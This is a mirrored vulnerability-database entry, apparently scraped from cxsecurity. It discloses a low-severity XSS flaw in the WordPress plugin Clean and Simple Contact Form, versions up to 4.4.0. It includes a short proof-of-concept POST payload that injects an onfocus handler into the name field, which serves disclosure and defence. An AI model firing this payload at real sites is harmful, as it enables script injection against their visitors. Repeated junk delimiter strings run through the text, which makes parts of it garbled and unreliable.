WordPress Clean And Simple Contact Form 4.4.0 XSS

30   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1327
CVE编号:
漏洞类型: -
漏洞来源: cxs
发布日期: 2014-11-05
CVSS
CVSS值: -
严重级别: 低危
利用范围: -
攻击复杂度: -
认证级别: -
漏洞描述

WLB-2014110014[***]http://cxsecurity.com/issue/WLB-2014110014[***]Bug: WordPress Clean And Simple Contact Form 4.4.0 XSS ( Ascii Version )[***]WordPress Clean And Simple Contact Form 4.4.0 XSS[***]2014.11.05[***]Ajin Abraham[***]Low[***]CWE-79@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]N/A ( Add )@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** </form>[***]No[***]Yes[***][***][***][***][***][***][***][***][***] Author : Ajin Abraham@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Author Website: http://opensecurity.in@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Affected Product: WordPress Clean and Simple Contact Form@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Affected Version: &lt;= 4.4.0@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vendor: Meg Nicholas@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vendor URL:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** WP Plugin URL:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** PoC:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Make a POST request to the page containing the contact form generated by@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** "Clean and Simple Contact Form"@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x="@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** POST http://localhost/contact-us/@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** cscf[name]=" onfocus=alert(1) autofocus x="@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** *Regards,Ajin*@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/

POC

Author : Ajin Abraham Author Website: http://opensecurity.in Affected Product: WordPress Clean and Simple Contact Form Affected Version: &lt;= 4.4.0 Vendor: Meg Nicholas Vendor URL: http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/ WP Plugin URL: https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/ PoC: Make a POST request to the page containing the contact form generated by "Clean and Simple Contact Form" with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x=" POST http://localhost/contact-us/ cscf[name]=" onfocus=alert(1) autofocus x=" *Regards,Ajin*